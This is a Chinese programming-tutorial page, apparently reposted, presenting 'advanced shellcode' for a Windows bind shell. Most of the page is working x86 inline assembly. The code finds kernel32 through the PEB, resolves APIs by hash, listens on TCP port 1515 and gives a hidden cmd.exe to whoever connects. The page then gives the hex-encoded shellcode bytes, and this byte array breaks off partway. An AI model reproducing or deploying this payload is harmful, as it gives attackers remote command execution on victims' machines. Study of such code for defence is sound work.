-
编程语言
站-
热门城市 全国站>
-
其他省市
-
-
15692118659
小标
2019-06-10
来源 :
阅读 1214
评论 0
摘要:本文主要向大家介绍了C/C++知识点之高级shellcode(Payload_Bindshell),通过具体的内容向大家展示,希望对大家学习C/C++知识点有所帮助。
本文主要向大家介绍了C/C++知识点之高级shellcode(Payload_Bindshell),通过具体的内容向大家展示,希望对大家学习C/C++知识点有所帮助。
<
<p>1.函数加密</p>
<pre><code class="hljs cpp"><span>//函数加密 摘要 (条件尽可能避免有0x00 尽可能避免发生碰撞)注意没有加.dll</span>
<span><span>int</span> <span>Hash_GetDigest</span><span>(<span>char</span> * strFunName)</span> </span>{
<span>unsigned</span> <span>int</span> nDigest = <span>0</span>;
<span>while</span> (*strFunName)
{
nDigest = ((nDigest << <span>25</span>) | nDigest >> <span>7</span>);
nDigest = nDigest + *strFunName;
strFunName++;
}
<span>return</span> nDigest;
}
</code></pre>
<p>先运行试试 成功<br><img style="cursor: pointer;" src="//i2.51cto.com/images/blog/201806/05/54be8cc8e0f8122dca6b3685954f88db.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=" alt="高级shellcode(Payload_Bindshell)"><br>测试shellcode 正常(注意win下要手动去开户telnet服务)<br><img style="cursor: pointer;" src="//i2.51cto.com/images/blog/201806/05/2281b1e350e1b907b6a12df3817a9776.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=" alt="高级shellcode(Payload_Bindshell)"><br>把shellcode放入异常处就可以了</p>
<pre><code class="hljs objectivec"><span>// ConsoleApplication2.cpp : 定义控制台应用程序的入口点。</span>
<span>//</span>
<span>#include <span>"stdafx.h"</span></span>
<span>//函数加密摘要 (条件尽可能避免有0x00 尽可能避免发生碰撞)注意没有加.dll</span>
<span>int</span> Hash_GetDigest(<span>char</span> * strFunName) {
<span>unsigned</span> <span>int</span> nDigest = <span>0</span>;
<span>while</span> (*strFunName)
{
nDigest = ((nDigest << <span>25</span>) | nDigest >> <span>7</span>);
nDigest = nDigest + *strFunName;
strFunName++;
}
<span>return</span> nDigest;
}
<span>int</span> _tmain(<span>int</span> argc, _TCHAR* argv[])
{
__<span>asm</span>
{
SUB ESP, <span>0x20</span> <span>// 开辟一段栈空间,增加健壮性</span>
push ebp
mov ebp, esp
sub esp, <span>0x10</span>
JMP tag_Shellcode <span>// 前置代码,避免后面的数据被解释为指令</span>
<span>// [tag_Next-0x25] "cmd.exe\0"</span>
_<span>asm</span> _emit(<span>0x63</span>)_<span>asm</span> _emit(<span>0x6D</span>)_<span>asm</span> _emit(<span>0x64</span>)_<span>asm</span> _emit(<span>0x2E</span>)
_<span>asm</span> _emit(<span>0x65</span>)_<span>asm</span> _emit(<span>0x78</span>)_<span>asm</span> _emit(<span>0x65</span>)_<span>asm</span> _emit(<span>0x00</span>)
<span>// [tag_Next-0x1D] "ws2_32.dll\0"</span>
_<span>asm</span> _emit(<span>0x77</span>)_<span>asm</span> _emit(<span>0x73</span>)_<span>asm</span> _emit(<span>0x32</span>)_<span>asm</span> _emit(<span>0x5F</span>)
_<span>asm</span> _emit(<span>0x33</span>)_<span>asm</span> _emit(<span>0x32</span>)_<span>asm</span> _emit(<span>0x2E</span>)_<span>asm</span> _emit(<span>0x64</span>)
_<span>asm</span> _emit(<span>0x6C</span>)_<span>asm</span> _emit(<span>0x6C</span>)_<span>asm</span> _emit(<span>0x00</span>)
<span>// [tag_Next-0x12] "kernel32.dll\0"</span>
_<span>asm</span> _emit(<span>0x6B</span>)_<span>asm</span> _emit(<span>0x65</span>)_<span>asm</span> _emit(<span>0x72</span>)_<span>asm</span> _emit(<span>0x6E</span>)
_<span>asm</span> _emit(<span>0x65</span>)_<span>asm</span> _emit(<span>0x6C</span>)_<span>asm</span> _emit(<span>0x33</span>)_<span>asm</span> _emit(<span>0x32</span>)
_<span>asm</span> _emit(<span>0x2E</span>)_<span>asm</span> _emit(<span>0x64</span>)_<span>asm</span> _emit(<span>0x6C</span>)_<span>asm</span> _emit(<span>0x6C</span>)
_<span>asm</span> _emit(<span>0x00</span>)
tag_Shellcode:
<span>// 1. GetPC</span>
<span>CALL</span> tag_Next
tag_Next :
pop ebx <span>// ebx = BaseAddr</span>
mov[ebp - <span>0x04</span>], ebx <span>// Local_1 = Shellcode BaseAddr</span>
<span>// 2. 获取关键模块基址</span>
mov esi, dword ptr fs : [<span>0x30</span>] <span>// esi = PEB的地址</span>
mov esi, [esi + <span>0x0C</span>] <span>// esi = 指向PEB_LDR_DATA结构的指针</span>
mov esi, [esi + <span>0x1C</span>] <span>// esi = 模块链表指针InInit...List</span>
mov esi, [esi] <span>// esi = 访问链表中的第二个条目</span>
mov edx, [esi + <span>0x08</span>] <span>// edx = 获取Kernel32.dll基址</span>
<span>// 3. 获取LoadLibraryExA的函数地址</span>
push edx <span>// ImageBase = Kernel32.dll</span>
push <span>0xC0D83287</span> <span>// nHashDigest = LoadLibraryExA Digest</span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
mov edi, eax <span>// edi = LoadLibraryExA</span>
<span>// 4. 加载Kernel32.dll,增强兼容新(Win7取得的是KernelBase.dll的基址)</span>
lea esi, [ebx - <span>0x12</span>] <span>// eax = "kernel32.dll\0"</span>
push <span>0</span> <span>// /-dwFlags = 0</span>
push <span>0</span> <span>// |-hFile = 0</span>
push esi <span>// |-lpLibFileName = "kernel32.dll"</span>
call edi <span>// LoadLibraryExA()</span>
mov[ebp - <span>0x08</span>], eax <span>// Local_2 = Kernel32.dll基址</span>
<span>// 5. 加载ws2_32.dll,以方便后面的网络通信编程</span>
lea esi, [ebx - <span>0x1D</span>] <span>// eax = "ws2_32.dll\0"</span>
push <span>0</span> <span>// /-dwFlags = 0</span>
push <span>0</span> <span>// |-hFile = 0</span>
push esi <span>// |-lpLibFileName = "ws2_32.dll"</span>
call edi <span>// LoadLibraryExA()</span>
mov[ebp - <span>0x0C</span>], eax <span>// Local_3 = ws2_32.dll基址</span>
<span>// 6. 调用Payload部分</span>
push[ebp - <span>0x0C</span>] <span>// ws2_32.dll基址</span>
push[ebp - <span>0x08</span>] <span>// Kernel32.dll基址</span>
push[ebp - <span>0x04</span>] <span>// BaseAddr</span>
call fun_Payload
<span>// 7. Payload执行完毕,结束程序,防止被调试分析</span>
push[ebp - <span>0x08</span>] <span>// ImageBase = Param_2(Kernel32.dll)</span>
push <span>0x4FD18963</span> <span>// nHashDigest = ExitProcess Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
push <span>0</span> <span>// /-uExitCode = NULL</span>
call eax <span>// ExitProcess()</span>
mov esp, ebp
pop ebp
<span>/***********************************************************/</span>
<span>/* 函数:根据Hash值获取指定的函数地址,返回值为关键函数地址*/</span>
<span>/***********************************************************/</span>
fun_GetFunAddrByHash : <span>// (int nHashDigest, int ImageBase)</span>
push ebp
mov ebp, esp
sub esp, <span>0x0C</span>
push edx
<span>// 1. 获取EAT、ENT与EOT的地址</span>
mov edx, [ebp + <span>0x0C</span>] <span>// edx = Param_1(ImageBase)</span>
mov esi, [edx + <span>0x3C</span>] <span>// esi = IMAGE_DOS_HEADER.e_lfanew</span>
lea esi, [edx + esi] <span>// esi = PE文件头</span>
mov esi, [esi + <span>0x78</span>] <span>// esi = IMAGE_DIR...EXPORT.VirtualAddress</span>
lea esi, [edx + esi] <span>// esi = 导出表首地址</span>
mov edi, [esi + <span>0x1C</span>] <span>// esi = IMAGE_EXP...ORY.AddressOfFunctions</span>
lea edi, [edx + edi] <span>// edi = EAT首地址</span>
mov[ebp - <span>0x04</span>], edi <span>// Local_1 = edi = EAT首地址</span>
mov edi, [esi + <span>0x20</span>] <span>// edi = IMAGE_EXP...ORY.AddressOfNames</span>
lea edi, [edx + edi] <span>// edi = ENT首地址</span>
mov[ebp - <span>0x08</span>], edi <span>// Local_2 = edi = ENT首地址</span>
mov edi, [esi + <span>0x24</span>] <span>// edi = IMAGE_EXP...ORY.AddressOfNameOrdinals</span>
lea edi, [edx + edi] <span>// edi = EOT首地址</span>
mov[ebp - <span>0x0C</span>], edi <span>// Local_3 = edi = EOT首地址</span>
<span>// 2. 循环对比ENT中的函数名</span>
xor ecx, ecx
jmp tag_FirstCmp
tag_CmpFunNameLoop :
inc ecx
tag_FirstCmp :
mov esi, [ebp - <span>0x08</span>] <span>// esi = Local_2(ENT)</span>
mov esi, [esi + <span>4</span> * ecx] <span>// esi = ENT RVA</span>
mov edx, [ebp + <span>0x0C</span>] <span>// edx = Param_1(ImageBase)</span>
lea esi, [edx + esi] <span>// esi = ENT VA</span>
push[ebp + <span>0x08</span>] <span>// nDigest = Param_1(nHashDigest)</span>
push esi <span>// strFunName = ENT VA</span>
call fun_Hash_CmpString <span>// fun_Hash_CmpString</span>
test eax, eax
jz tag_CmpFunNameLoop <span>// 如果不相等则继续循环比对</span>
<span>// 3. 成功后找到对应的序号</span>
mov esi, [ebp - <span>0x0C</span>] <span>// esi = Local_3(EOT)</span>
xor edi, edi
mov di, [esi + ecx * <span>2</span>] <span>// edi = 用函数名数组下标在序号数组找到对应序号</span>
<span>// 4. 使用序号作为索引,找到函数名所对应的函数地址</span>
mov edx, [ebp - <span>0x04</span>] <span>// edx = Local_1(EAT)</span>
mov esi, [edx + edi * <span>4</span>] <span>// esi = 用序号在函数地址数组找到对应的函数地址</span>
mov edx, [ebp + <span>0x0C</span>] <span>// edx = Param_1(ImageBase)</span>
<span>// 5. 返回获取到的关键函数地址</span>
lea eax, [edx + esi] <span>// 返回GetProcAddress的地址</span>
pop edx
mov esp, ebp
pop ebp
retn <span>0x08</span>
<span>/***************************************************************/</span>
<span>/* 函数:根据摘要确认函数名,若函数名与此摘要相符返回1否则返回0*/</span>
<span>/***************************************************************/</span>
fun_Hash_CmpString: <span>//(char *strFunName, int nDigest)</span>
push ebp
mov ebp, esp
sub esp, <span>0x04</span> <span>// 开辟局部变量并清零</span>
mov dword ptr[ebp - <span>0x04</span>], <span>0x00</span>
push ebx <span>// 保存用到的寄存器</span>
push ecx
push edx
mov esi, [ebp + <span>0x08</span>] <span>// esi = Param_1(strFunName)</span>
xor ecx, ecx
xor eax, eax
tag_HashLoop :
mov al, [esi + ecx] <span>// al = 字符串的第ECX个字符</span>
test al, al <span>// 判断是否为0,为0结束循环</span>
jz tag_HashEnd
mov ebx, [ebp - <span>0x04</span>] <span>// ebx = Local_1(摘要)</span>
shl ebx, <span>0x19</span> <span>// ebx = 摘要<<0x19(25)</span>
mov edx, [ebp - <span>0x04</span>] <span>// edx = Local_1(摘要)</span>
shr edx, <span>0x07</span> <span>// edx = 摘要>>0x07(07)</span>
or ebx, edx <span>// edx = ebx|edx</span>
add ebx, eax <span>// edx = edx + 字符的ASCII</span>
mov[ebp - <span>0x04</span>], ebx
inc ecx <span>// ecx++</span>
jmp tag_HashLoop
tag_HashEnd :
mov ebx, [ebp + <span>0x0C</span>] <span>// ebx = Param_2(nDigest)</span>
mov edx, [ebp - <span>0x04</span>] <span>// edx = Local_1(摘要)</span>
xor eax, eax
cmp ebx, edx
jne tag_FunEnd
mov eax, <span>1</span>
tag_FunEnd:
pop edx
pop ecx
pop ebx
mov esp, ebp
pop ebp
retn <span>0x08</span>
<span>/**********************************/</span>
<span>/* 函数:有效载荷部分,返回值Null */</span>
<span>/**********************************/</span>
fun_Payload: <span>// (int BaseAddr, int Kernel32_Base, int ws2_32_Base)</span>
push ebp
mov ebp, esp
sub esp, <span>0x300</span>
<span>// 1. 初始化Winsock服务</span>
push[ebp + <span>0x10</span>] <span>// ImageBase = Param_3(ws2_32.dll)</span>
push <span>0x80B46A3D</span> <span>// nHashDigest = WSAStartup Digest</span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
lea esi, [ebp - <span>0x300</span>] <span>// esi = WSADATA</span>
push esi <span>// /-lpWSAData = WSADATA</span>
push <span>0x0202</span> <span>// |-wVersionRequested = 2.2</span>
call eax <span>// WSAStartup()</span>
test eax, eax
jnz tag_PaloadEnd
<span>// 2. 创建一个原始套接字</span>
push[ebp + <span>0x10</span>] <span>// ImageBase = Param_3(ws2_32.dll)</span>
push <span>0xDE78322D</span> <span>// nHashDigest = WSASocketA Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
push <span>0</span> <span>// /-dwFlags = NULL</span>
push <span>0</span> <span>// |-g = NULL</span>
push <span>0</span> <span>// |-lpProtocolInfo = NULL</span>
push <span>6</span> <span>// |-protocol = IPPROTO_TCP</span>
push <span>1</span> <span>// |-type = SOCK_STREAM</span>
push <span>2</span> <span>// |-af = AF_INET</span>
call eax <span>// WSASocketA()</span>
mov[ebp - <span>0x04</span>], eax <span>// Local_1 = SOCKET</span>
<span>// 3. 在任意地址(INADDR_ANY)上绑定一个端口1515[0x05BE-->0xBE05]</span>
push[ebp + <span>0x10</span>] <span>// ImageBase = Param_3(ws2_32.dll)</span>
push <span>0xDDA71064</span> <span>// nHashDigest = bind Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
mov word ptr[ebp - <span>0x200</span>], <span>0x02</span> <span>// / SOCKADDR_IN.sin_family = AF_INET</span>
mov word ptr[ebp - <span>0x1FE</span>], <span>0xEB05</span> <span>// | SOCKADDR_IN.sin_port = 0xEB05(1515)</span>
mov dword ptr[ebp - <span>0x1FC</span>], <span>0</span> <span>// \ SOCKADDR_IN.sin_addr = INADDR_ANY </span>
lea esi, [ebp - <span>0x200</span>] <span>// esi = SOCKADDR_IN</span>
push <span>0x14</span> <span>// /-namelen = 0x14</span>
push esi <span>// |-name = SOCKADDR_IN</span>
push[ebp - <span>0x04</span>] <span>// |-s = Local_1(SOCKET)</span>
call eax <span>// bind()</span>
test eax, eax
jnz tag_PaloadEnd
<span>// 4. 监听申请的连接,队列中可容纳5个链接</span>
push[ebp + <span>0x10</span>] <span>// ImageBase = Param_3(ws2_32.dll)</span>
push <span>0x4BD39F0C</span> <span>// nHashDigest = listen Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
push <span>0x7FFFFFFF</span> <span>// /-backlog = SOMAXCONN</span>
push[ebp - <span>0x04</span>] <span>// |-s = Local_1(SOCKET)</span>
call eax <span>// listen()</span>
test eax, eax
jnz tag_PaloadEnd
<span>// 5. 接受一个连接</span>
push[ebp + <span>0x10</span>] <span>// ImageBase = Param_3(ws2_32.dll)</span>
push <span>0x01971EB1</span> <span>// nHashDigest = accept Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
push <span>0</span> <span>// /-addrlen = NULL</span>
push <span>0</span> <span>// |-addr = NULL</span>
push[ebp - <span>0x04</span>] <span>// |-s = Local_1(SOCKET)</span>
call eax <span>// accept()</span>
mov[ebp - <span>0x04</span>], eax <span>// Local_1(SOCKET) = SOCKET</span>
<span>// 6. 创建一个CMD进程,并将其输入与输出重定位到我们创建的套接字上</span>
push[ebp + <span>0x0C</span>] <span>// ImageBase = Param_2(Kernel32.dll)</span>
push <span>0x6BA6BCC9</span> <span>// nHashDigest = CreateProcessA Digest </span>
call fun_GetFunAddrByHash <span>// fun_GetFunAddrByHash</span>
mov edx, eax <span>// edx = CreateProcessA</span>
lea edi, [ebp - <span>0x90</span>] <span>// / 清空STARTUPINFOA</span>
mov ecx, <span>0x11</span> <span>// | STARTUPINFOA</span>
mov eax, <span>0x00</span> <span>// | 从[ebp-0x90]开始</span>
cld <span>// | 到[ebp-0x48]结束</span>
rep stosd <span>// |</span>
mov dword ptr[ebp - <span>0x90</span>], <span>0x00000044</span> <span>// | STA...A.cb = 48</span>
mov dword ptr[ebp - <span>0x64</span>], <span>0x00000100</span> <span>// | STA...A.dwFlags = STARTF_USESTDHANDLES</span>
mov word ptr[ebp - <span>0x60</span>], <span>0x0000</span> <span>// | STA...A.wShowWindow = SW_HIDE</span>
mov esi, [ebp - <span>0x04</span>] <span>// esi = Local_1(SOCKET)</span>
mov dword ptr[ebp - <span>0x58</span>], esi <span>// | STA...A.hStdInput = SOCKET</span>
mov dword ptr[ebp - <span>0x54</span>], esi <span>// | STA...A.hStdOutput = SOCKET</span>
mov dword ptr[ebp - <span>0x50</span>], esi <span>// \ STA...A.hStdError = SOCKET</span>
lea esi, [ebp - <span>0x90</span>] <span>// esi = STARTUPINFOA</span>
lea edi, [ebp - <span>0x200</span>] <span>// edi = PROCESS_INFORMATION </span>
mov ebx, [ebp + <span>0x08</span>] <span>// ebx = Param_1(BaseAddr)</span>
lea ebx, [ebx - <span>0x25</span>] <span>// ebx = "cmd.exe\0"</span>
push edi <span>// /-lpProcessInformation = PROCESS_INFORMATION</span>
push esi <span>// |-lpStartupInfo = STARTUPINFOA</span>
push <span>0</span> <span>// |-lpCurrentDirectory = NULL</span>
push <span>0</span> <span>// |-lpEnvironment = NULL</span>
push <span>0</span> <span>// |-dwCreationFlags = NULL</span>
push <span>1</span> <span>// |-bInheritHandles = TRUE</span>
push <span>0</span> <span>// |-lpThreadAttributes = NULL</span>
push <span>0</span> <span>// |-lpProcessAttributes = NULL</span>
push ebx <span>// |-lpCommandLine = "cmd.exe\0"</span>
push <span>0</span> <span>// |-lpApplicationName = NULL</span>
call edx <span>// CreateProcessA()</span>
tag_PaloadEnd :
mov esp, ebp
pop ebp
retn <span>0x0C</span>
}
<span>return</span> <span>0</span>;
}</code></pre>
<pre><code class="hljs java"><span><span>int</span> <span>_tmain</span><span>(<span>int</span> argc, _TCHAR* argv[])</span>
</span>{
<span>char</span> bShellcode[] = { <span>"\x83\xEC\x20\x55\x8B\xEC\x83\xEC\x10\xEB\x20\x63\x6D\x64\x2E\x65\x78\x65\x00\x77\x73\x32\x5F\x33\x32\x2E\x64\x6C\x6C\x00\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64\x6C\x6C\x00\xE8\x00\x00\x00\x00\x5B\x89\x5D\xFC\x64\x8B\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x56\x08\x52\x68\x87\x32\xD8\xC0\xE8\x3E\x00\x00\x00\x8B\xF8\x8D\x73\xEE\x6A\x00\x6A\x00\x56\xFF\xD7\x89\x45\xF8\x8D\x73\xE3\x6A\x00\x6A\x00\x56\xFF\xD7\x89\x45\xF4\xFF\x75\xF4\xFF\x75\xF8\xFF\x75\xFC\xE8\xCD\x00\x00\x00\xFF\x75\xF8\x68\x63\x89\xD1\x4F\xE8\x07\x00\x00\x00\x6A\x00\xFF\xD0\x8B\xE5\x5D\x55\x8B\xEC\x83\xEC\x0C\x52\x8B\x55\x0C\x8B\x72\x3C\x8D\x34\x32\x8B\x76\x78\x8D\x34\x32\x8B\x7E\x1C\x8D\x3C\x3A\x89\x7D\xFC\x8B\x7E\x20\x8D\x3C\x3A\x89\x7D\xF8\x8B\x7E\x24\x8D\x3C\x3A\x89\x7D\xF4\x33\xC9\xEB\x01\x41\x8B\x75\xF8\x8B\x34\x8E\x8B\x55\x0C\x8D\x34\x32\xFF\x75\x08\x56\xE8\x20\x00
本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注职坐标编程语言C/C+频道!
喜欢 | 0
不喜欢 | 0
您输入的评论内容中包含违禁敏感词
我知道了
请输入正确的手机号码
请输入正确的验证码
您今天的短信下发次数太多了,明天再试试吧!
我们会在第一时间安排职业规划师联系您!
您也可以联系我们的职业规划师咨询:
版权所有 职坐标-一站式AI+学习就业服务平台 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
沪公网安备 31011502005948号
资料领取
答疑解惑
技术交流
职业测评
面试技巧
高薪秘笈
